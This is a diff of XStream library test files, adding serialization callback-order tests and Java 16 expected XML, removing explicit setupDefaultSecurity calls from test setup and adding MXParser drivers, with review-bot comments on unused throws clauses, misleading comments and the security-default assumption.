@@ -229,6 +231,72 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest { } } + public static class UnserializableBase { + protected UnserializableBase() { + log.actual("UnserializableBase.UnserializableBase()"); + } + } + + public static class ChildUnserializableBase extends UnserializableBase implements Serializable { + /* + private ChildUnserializableBase() { + log.actual("ChildUnserializableBase.ChildUnserializableBase()"); + } + */ + + public ChildUnserializableBase(String s) { + log.actual("ChildUnserializableBase.ChildUnserializableBase(String)"); + } + + private void writeObject(ObjectOutputStream out) throws IOException { + log.actual("ChildUnserializableBase.writeObject() start"); + out.defaultWriteObject(); + log.actual("ChildUnserializableBase.writeObject() end"); + } + + private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { + log.actual("ChildUnserializableBase.readObject() start"); + in.defaultReadObject(); + log.actual("ChildUnserializableBase.readObject() end"); + } + } + + public static class ChildUnserializableBaseRR extends ChildUnserializableBase { + private ChildUnserializableBaseRR() { + super(""); + log.actual("ChildUnserializableBaseRR.ChildUnserializableBaseRR()"); + } + + public ChildUnserializableBaseRR(String s) { + super(s); + log.actual("ChildUnserializableBaseRR.ChildUnserializableBaseRR(String)"); + } + + private void writeObject(ObjectOutputStream out) throws IOException { + log.actual("ChildUnserializableBaseRR.writeObject() start"); + out.defaultWriteObject(); + out.writeInt(42); + log.actual("ChildUnserializableBaseRR.writeObject() end"); + } + + private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { + log.actual("ChildUnserializableBaseRR.readObject() start"); + in.defaultReadObject(); + in.readInt(); + log.actual("ChildUnserializableBaseRR.readObject() end"); + } + + Object writeReplace() { + 
log.actual("ChildUnserializableBaseRR.writeReplace()"); + return this; + } + + Object readResolve() { + log.actual("ChildUnserializableBaseRR.readResolve()"); + return this; + } + } + // --- Convenience wrappers around Java Object Serialization private byte[] javaSerialize(Object object) throws IOException { @@ -335,6 +403,39 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest { log.verify(); } + public void testJavaSerializationUnserializableBase() throws IOException { + final Serializable object = new ChildUnserializableBase(""); + log.reset(); + + // expectations + log.expect("ChildUnserializableBase.writeObject() start"); + log.expect("ChildUnserializableBase.writeObject() end"); + + // execute + javaSerialize(object); + + // verify + log.verify(); + } + + public void testJavaSerializationUnserializableBaseRR() throws IOException { + final Serializable object = new ChildUnserializableBaseRR(""); + log.reset(); + + // expectations + log.expect("ChildUnserializableBaseRR.writeReplace()"); + log.expect("ChildUnserializableBase.writeObject() start"); + log.expect("ChildUnserializableBase.writeObject() end"); + log.expect("ChildUnserializableBaseRR.writeObject() start"); + log.expect("ChildUnserializableBaseRR.writeObject() end"); + + // execute + javaSerialize(object); + + // verify + log.verify(); + } + public void testXStreamSerializationOwnPrivateRR() { // expectations log.expect("PrivateChildOwnRR.writeReplace()"); 
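Review bot: ChildUnserializableBase, declared at the start of this hunk on the previous line, carries a commented-out private no-arg constructor; commented-out code leaves the reader guessing whether it was removed by accident. If the intent is that the serializable child deliberately has no no-arg constructor so the deserialization tests can observe which constructor each provider runs, say so instead: `// Intentionally no no-arg constructor: the deserialization tests check which ctors each provider invokes`. The `String s` parameter of `ChildUnserializableBase(String)` is unused and could be named `ignored`, and unlike `SerializablePair` and `ResolveToNull` added in this commit, neither serializable fixture declares a `serialVersionUID`.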
@@ -424,6 +525,39 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest { log.verify(); } + public void testXStreamSerializationUnserializableBase() throws IOException { + final Serializable object = new ChildUnserializableBase(""); + log.reset(); + + // expectations + log.expect("ChildUnserializableBase.writeObject() start"); + log.expect("ChildUnserializableBase.writeObject() end"); + + // execute + xstream.toXML(object); + + // verify + log.verify(); + } + + public void testXStreamSerializationUnserializableBaseRR() throws IOException { + final Serializable object = new ChildUnserializableBaseRR(""); + log.reset(); + + // expectations + log.expect("ChildUnserializableBaseRR.writeReplace()"); + log.expect("ChildUnserializableBase.writeObject() start"); + log.expect("ChildUnserializableBase.writeObject() end"); + log.expect("ChildUnserializableBaseRR.writeObject() start"); + log.expect("ChildUnserializableBaseRR.writeObject() end"); + + // execute + xstream.toXML(object); + + // verify + log.verify(); + } + public void testJavaDeserializationOwnPrivateRR() throws IOException, ClassNotFoundException { // setup byte[] data = javaSerialize(new PrivateChildOwnRR()); 
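Review bot: testXStreamSerializationUnserializableBase and testXStreamSerializationUnserializableBaseRR declare `throws IOException` although their bodies only call `xstream.toXML(object)`, which as far as visible here throws no checked exception; the clause looks copied from the Java-serialization variants and makes a reader look for I/O that is not there. Drop it: `public void testXStreamSerializationUnserializableBase() {` and likewise for the RR variant.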
@@ -537,6 +671,43 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest { log.verify(); } + public void testJavaDeserializationUnserializableBase() throws IOException, ClassNotFoundException { + // setup + byte[] data = javaSerialize(new ChildUnserializableBase("")); + log.reset(); + + // expectations + log.expect("UnserializableBase.UnserializableBase()"); + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + + // execute + javaDeserialize(data); + + // verify + log.verify(); + } + + public void testJavaDeserializationUnserializableBaseRR() throws IOException, ClassNotFoundException { + // setup + byte[] data = javaSerialize(new ChildUnserializableBaseRR("")); + log.reset(); + + // expectations + log.expect("UnserializableBase.UnserializableBase()"); + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + log.expect("ChildUnserializableBaseRR.readObject() start"); + log.expect("ChildUnserializableBaseRR.readObject() end"); + log.expect("ChildUnserializableBaseRR.readResolve()"); + + // execute + javaDeserialize(data); + + // verify + log.verify(); + } + public void testXStreamDeserializationOwnPrivateRR() { // setup String data = xstream.toXML(new PrivateChildOwnRR()); 
@@ -650,6 +821,98 @@ public class SerializationCallbackOrderTest extends AbstractAcceptanceTest { log.verify(); } + public void testXStreamDeserializationUnserializableBaseUnsafe() throws IOException, ClassNotFoundException { + // Use Java deserialization for Serializables with unserializable parent, but no readResolve + + // setup + String data = xstream.toXML(new ChildUnserializableBase("")); + log.reset(); + + // expectations + // log.expect("UnserializableBase.UnserializableBase()"); // XStream cannot call ctor of parent only + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + + // execute + xstream.fromXML(data); + + // verify + log.verify(); + } + + public void testXStreamDeserializationUnserializableBasePure() throws IOException, ClassNotFoundException { + // Use Java deserialization for Serializables with unserializable parent, but no readResolve + + // setup + xstream.registerConverter(new SerializableConverter(xstream.getMapper(), new PureJavaReflectionProvider(), + xstream.getClassLoaderReference()) { + public boolean canConvert(Class type) { + return type == ChildUnserializableBase.class; + } + }); + String data = xstream.toXML(new ChildUnserializableBase("")); + log.reset(); + + // expectations + log.expect("UnserializableBase.UnserializableBase()"); + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + + // execute + xstream.fromXML(data); + + // verify + log.verify(); + } + + public void testXStreamDeserializationUnserializableBaseRRUnsafe() throws IOException, ClassNotFoundException { + // setup + String data = xstream.toXML(new ChildUnserializableBaseRR("")); + log.reset(); + + // expectations + // log.expect("UnserializableBase.UnserializableBase()"); // XStream cannot call ctor of parent only + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + 
log.expect("ChildUnserializableBaseRR.readObject() start"); + log.expect("ChildUnserializableBaseRR.readObject() end"); + log.expect("ChildUnserializableBaseRR.readResolve()"); + + // execute + xstream.fromXML(data); + + // verify + log.verify(); + } + + public void testXStreamDeserializationUnserializableBaseRRPure() throws IOException, ClassNotFoundException { + // setup + xstream.registerConverter(new SerializableConverter(xstream.getMapper(), new PureJavaReflectionProvider(), + xstream.getClassLoaderReference()) { + public boolean canConvert(Class type) { + return type == ChildUnserializableBaseRR.class; + } + }); + String data = xstream.toXML(new ChildUnserializableBaseRR("")); + log.reset(); + + // expectations + log.expect("UnserializableBase.UnserializableBase()"); + log.expect("ChildUnserializableBase.ChildUnserializableBase(String)"); // XStream cannot call ctor of parent only + log.expect("ChildUnserializableBaseRR.ChildUnserializableBaseRR()"); // XStream cannot call ctor of parent only + log.expect("ChildUnserializableBase.readObject() start"); + log.expect("ChildUnserializableBase.readObject() end"); + log.expect("ChildUnserializableBaseRR.readObject() start"); + log.expect("ChildUnserializableBaseRR.readObject() end"); + log.expect("ChildUnserializableBaseRR.readResolve()"); + + // execute + xstream.fromXML(data); + + // verify + log.verify(); + } + public static class ParentNotTransient implements Serializable { public int somethingNotTransient; diff --git a/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java b/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java index 130c63515990082e72dd59852c2693f9f78fff8f..8a02dc3540a78faa5daeda92480731b0ce528dcc 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java 
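Review bot: The two `...Unsafe` tests at the start of this hunk (which begins on the previous line) rely on the class's default `xstream` instance using the Unsafe-based reflection provider, while the `...Pure` variants register a `SerializableConverter` with an explicit PureJavaReflectionProvider; if the JVM picks a different default provider (a platform without `sun.misc.Unsafe`, presumably), the Unsafe expectations would fail without saying why. Either guard them on the provider actually in use or register the Unsafe-based provider explicitly, mirroring the Pure tests. In testXStreamDeserializationUnserializableBaseRRPure the comment `// XStream cannot call ctor of parent only` is attached to expectations that show the child's constructors being run, which is the opposite situation from the Unsafe tests where the same comment appears; reword it to what those lines show, e.g. `// PureJavaReflectionProvider runs the type's own constructor chain instead of only the first unserializable parent's`. The `throws IOException, ClassNotFoundException` clauses on all four methods are unused since the bodies only call toXML/fromXML.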
@@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2011, 2017, 2019, 2020 XStream Committers. + * Copyright (C) 2006, 2007, 2011, 2017, 2019, 2020, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -294,7 +294,7 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest { + " </default>\n" + " </java.text.DecimalFormatSymbols>\n" + "</java.text.DecimalFormatSymbols>"; - } else { + } else if (!JVM.isVersion(16)) { xml = "" + "<java.text.DecimalFormatSymbols serialization=\"custom\">\n" + " <java.text.DecimalFormatSymbols>\n" 
@@ -324,6 +324,35 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest { + " </default>\n" + " </java.text.DecimalFormatSymbols>\n" + "</java.text.DecimalFormatSymbols>"; + } else { + xml = "" + + "<java.text.DecimalFormatSymbols serialization=\"custom\">\n" + + " <java.text.DecimalFormatSymbols>\n" + + " <default>\n" + + " <decimalSeparator>,</decimalSeparator>\n" + + " <digit>#</digit>\n" + + " <exponential>E</exponential>\n" + + " <groupingSeparator>.</groupingSeparator>\n" + + " <minusSign>-</minusSign>\n" + + " <monetaryGroupingSeparator>.</monetaryGroupingSeparator>\n" + + " <monetarySeparator>,</monetarySeparator>\n" + + " <patternSeparator>;</patternSeparator>\n" + + " <perMill>\u2030</perMill>\n" + + " <percent>%</percent>\n" + + " <serialVersionOnStream>5</serialVersionOnStream>\n" + + " <zeroDigit>0</zeroDigit>\n" + + " <NaN>NaN</NaN>\n" + + " <currencySymbol>\u20ac</currencySymbol>\n" + + " <exponentialSeparator>E</exponentialSeparator>\n" + + " <infinity>\u221e</infinity>\n" + + " <intlCurrencySymbol>EUR</intlCurrencySymbol>\n" + + " <locale>de_DE</locale>\n" + + " <minusSignText>-</minusSignText>\n" + + " <perMillText>\u2030</perMillText>\n" + + " <percentText>%</percentText>\n" + + " </default>\n" + + " </java.text.DecimalFormatSymbols>\n" + + "</java.text.DecimalFormatSymbols>"; } final DecimalFormatSymbols format = new DecimalFormatSymbols(Locale.GERMANY); format.setNaN("NaN"); diff --git a/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java b/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java index fde33dc574801bbd125ec1fc68061562b0c1c97a..2bb5988bde406c65e2e511ab26c4b524dcbddb26 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/annotations/XStream12AnnotationCompatibilityTest.java 
@@ -1,5 +1,5 @@ /* - * Copyright (C) 2007, 2017 XStream Committers. + * Copyright (C) 2007, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -27,7 +27,6 @@ public class XStream12AnnotationCompatibilityTest extends AbstractAcceptanceTest protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.allowTypes(new Class[]{ FieldConverterTest.TaskWithAnnotations.class, ImplicitCollectionTest.ImplicitRootOne.class}); xstream.registerConverter(new AnnotationReflectionConverter(xstream.getMapper(), xstream diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java index 573eb256e3d5d92578a1392991d0963a7ed4f7f1..d169979d45ddab161fb78c053c532f7f33522370 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumConverterTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -30,7 +30,6 @@ public class EnumConverterTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.alias("simple", SimpleEnum.class); xstream.alias("polymorphic", PolymorphicEnum.class); } diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java index 34d1a2eea8655ca805f41343c0d939ad245722df..458be400d97dfeb8d4e036cf4a86f1ef9cbf4661 100644 
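Review bot: Dropping `XStream.setupDefaultSecurity(xstream)` from `setUp()` is only behavior-preserving if the plain `XStream()` constructor now installs the same restrictive type allow-list by default; that library change is not part of this diff, so the suite should pin it with one test asserting that unmarshalling a type outside the allow-list on a freshly constructed `XStream` is rejected rather than silently instantiated. The same removal is made in EnumConverterTest, EnumCustomConverterTest, EnumMapConverterTest, EnumMapperTest, EnumSetConverterTest, EnumToStringConverterTest, FontConverterTest, GregorianCalendarConverterTest, ISO8601SqlTimestampConverterTest, JavaBeanConverterTest, ReflectionConverterTest, SerializableConverterTest, DriverEndToEndTestSuite, JettisonMappedXmlDriverTest, JDom2AcceptanceTest, JDomAcceptanceTest, StaxDriverTest, FilePersistenceStrategyTest and FileStreamStrategyTest. Tests such as EnumMapConverterTest, EnumSetConverterTest and GregorianCalendarConverterTest now call neither `setupDefaultSecurity` nor `allowTypes`, so they rely on the default allow-list already covering the JDK types they round-trip, which is worth confirming explicitly rather than inferring from a green run. In DriverEndToEndTestSuite the removed call was the instance form `xstream.setupDefaultSecurity(xstream)`, a static method invoked through an instance, so that removal also cleans up a misleading call site.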
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumCustomConverterTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2008, 2017 XStream Committers. + * Copyright (C) 2008, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -30,7 +30,6 @@ public class EnumCustomConverterTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.allowTypes(new Class[] {TypeWithEnums.class}); xstream.alias("simple", SimpleEnum.class); xstream.alias("polymorphic", PolymorphicEnum.class); diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java index c156a2033bd5045bdfb4f76632fddf0ff6161958..d1dbef3a8a1b1427e3c1d3e469b4649f1f18d15b 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapConverterTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -24,7 +24,6 @@ public class EnumMapConverterTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); } public void testIncludesEnumTypeInSerializedForm() { diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java index fe0f8d2c81890f1778d0c602b92dcc12733cec89..1ad07b544ac815a847f2368b0ecfcec64a59c0b0 100644 
--- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumMapperTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2008, 2017 XStream Committers. + * Copyright (C) 2008, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -34,7 +34,6 @@ public class EnumMapperTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"}); xstream.alias("simple", SimpleEnum.class); xstream.alias("polymorphic", PolymorphicEnum.class); diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java index 193bccf96813847e1c8302c0483dc7864c4028b3..3f483d990acf73b0b76f6c80ae751dc4ca9db578 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumSetConverterTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2013, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2013, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -24,7 +24,6 @@ public class EnumSetConverterTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); } public void testPutsEnumsInCompactCommaSeparatedString() { 
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java index 6ded47c53d7f715c9ad0279dddaad36970590476..bf3ef1d8a68fc2b1b85dad912d0a21118adf5f3c 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/EnumToStringConverterTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2013, 2017 XStream Committers. + * Copyright (C) 2013, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -32,7 +32,6 @@ public class EnumToStringConverterTest extends TestCase { protected void setUp() throws Exception { super.setUp(); xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.alias("simple", SimpleEnum.class); xstream.alias("big", BigEnum.class); xstream.alias("polymorphic", PolymorphicEnum.class); diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java b/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java index 2b691d1c39906e49c87839bb24246f8422808ff9..1cfd8c9658711612e4838840c80bc13a66ce2aa0 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/enums/SimpleEnum.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007 XStream Committers. + * Copyright (C) 2006, 2007, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -11,6 +11,6 @@ */ package com.thoughtworks.xstream.converters.enums; -enum SimpleEnum { +public enum SimpleEnum { RED, GREEN, BLUE; } 
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
index c4946ff62a0cac95f7d0e6fdaca2eab6ad665684..a5c4cec0f8dd880376ee9386d83437afbf9fdbdf 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/FontConverterTest.java
@@ -1,6 +1,6 @@
 /*
  * Copyright (C) 2004 Joe Walnes.
- * Copyright (C) 2006, 2007, 2013, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2013, 2017, 2021 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -44,7 +44,6 @@ public class FontConverterTest extends TestCase {
 super.setUp();
 // fonts should be serializable also with pure Java
 xstream = new XStream(new PureJavaReflectionProvider());
- XStream.setupDefaultSecurity(xstream);
 xstream.allowTypes(new Class[] {Font.class, TextAttribute.class, TransformAttribute.class, AffineTransform.class});
 in = new Font("Arial", Font.BOLD, 20);
 }
diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
index 17044fdf34b4757f89b0a2262296f74c0ccd02a5..d9e1724e404fdc638a6409e86568173134b11265 100644
--- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
+++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/GregorianCalendarConverterTest.java
@@ -1,6 +1,6 @@
 /*
  * Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers.
  * All rights reserved.
  *
  * The software in this package is published under the terms of the BSD
@@ -26,7 +26,6 @@ public class GregorianCalendarConverterTest extends TestCase { public void testCalendar() { final Calendar cal = Calendar.getInstance(TimeZone.getTimeZone("UTC")); final XStream xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); final String xml = xstream.toXML(cal); final Calendar serialized = (Calendar)xstream.fromXML(xml); assertEquals(cal, serialized); diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java index fafb8660a042ed27a8a57beb95f4337a34da892c..0ee476a44a433a9614db5a80478f062825ff4f7c 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/extended/ISO8601SqlTimestampConverterTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -43,7 +43,6 @@ public class ISO8601SqlTimestampConverterTest extends TestCase { private XStream createXStream() { XStream xs = new XStream(); - XStream.setupDefaultSecurity(xs); return xs; } diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java index 111aee90d742e62ba34ccfa88372a71d6a5a3336..fb9a4182627149319fb8b32a870b50f80d857536 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/javabean/JavaBeanConverterTest.java 
@@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013, 2014, 2015, 2016, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2010, 2011, 2013, 2014, 2015, 2016, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -22,7 +22,6 @@ public class JavaBeanConverterTest extends TestCase { private XStream createXStream() { XStream xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"}); return xstream; } diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java index d0280eb78c4c16221096a76f9a66417b73ad5ac8..d3f08d0260ffd741488885162b3c3aec7b4f5f33 100644 --- a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/ReflectionConverterTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2004, 2005, 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2010, 2013, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2010, 2013, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -73,7 +73,6 @@ public class ReflectionConverterTest extends TestCase { private XStream createXStream() { XStream xstream = new XStream(new XppDriver()); - XStream.setupDefaultSecurity(xstream); return xstream; } diff --git a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java index a81f63246c25052f5e87cde99de239ebc35eafa1..4a59dc4b63625423d17a513d69633fb7e358cb44 100644 
--- a/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/converters/reflection/SerializableConverterTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2007, 2014, 2017 XStream Committers. + * Copyright (C) 2007, 2014, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -29,7 +29,6 @@ public class SerializableConverterTest extends TestCase { private XStream createXStream() { XStream xstream = new XStream(); - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"}); return xstream; } diff --git a/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java b/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java index d99035aed21753925e0610a7825b64506b1017a2..f5aa9063e1bb761490a7394712ae7bb116e335ee 100644 --- a/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java +++ b/xstream/src/test/com/thoughtworks/xstream/io/DriverEndToEndTestSuite.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2011, 2013, 2016, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2011, 2013, 2016, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -27,6 +27,8 @@ import com.thoughtworks.xstream.io.xml.DomDriver; import com.thoughtworks.xstream.io.xml.JDomDriver; import com.thoughtworks.xstream.io.xml.KXml2DomDriver; import com.thoughtworks.xstream.io.xml.KXml2Driver; +import com.thoughtworks.xstream.io.xml.MXParserDomDriver; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.io.xml.StaxDriver; import com.thoughtworks.xstream.io.xml.WstxDriver; import com.thoughtworks.xstream.io.xml.XomDriver; 
@@ -80,6 +82,8 @@ public class DriverEndToEndTestSuite extends TestSuite { } addDriverTest(new WstxDriver()); addDriverTest(new XomDriver()); + addDriverTest(new MXParserDomDriver()); + addDriverTest(new MXParserDriver()); addDriverTest(new Xpp3DomDriver()); addDriverTest(new Xpp3Driver()); addDriverTest(new XppDomDriver()); @@ -98,7 +102,6 @@ public class DriverEndToEndTestSuite extends TestSuite { private void testObject(final HierarchicalStreamDriver driver) { final XStream xstream = new XStream(driver); - xstream.setupDefaultSecurity(xstream); xstream.allowTypes(new Class[] { SampleLists.class }); xstream.registerConverter(new CollectionConverter(xstream.getMapper()) { diff --git a/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java b/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java index d34962bfc2f2eddb632d28990aa93f120302e6ad..a01065a55755b52c0d0aa4b39cb7def77b8a5982 100644 --- a/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java +++ b/xstream/src/test/com/thoughtworks/xstream/io/binary/BinaryStreamTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2011, 2015, 2016 XStream Committers. + * Copyright (C) 2006, 2007, 2011, 2015, 2016, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -16,7 +16,7 @@ import com.thoughtworks.xstream.io.HierarchicalStreamReader; import com.thoughtworks.xstream.io.HierarchicalStreamWriter; import com.thoughtworks.xstream.io.copy.HierarchicalStreamCopier; import com.thoughtworks.xstream.io.xml.AbstractXMLReaderTest; -import com.thoughtworks.xstream.io.xml.Xpp3Driver; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import java.io.ByteArrayOutputStream; import java.io.StringReader; 
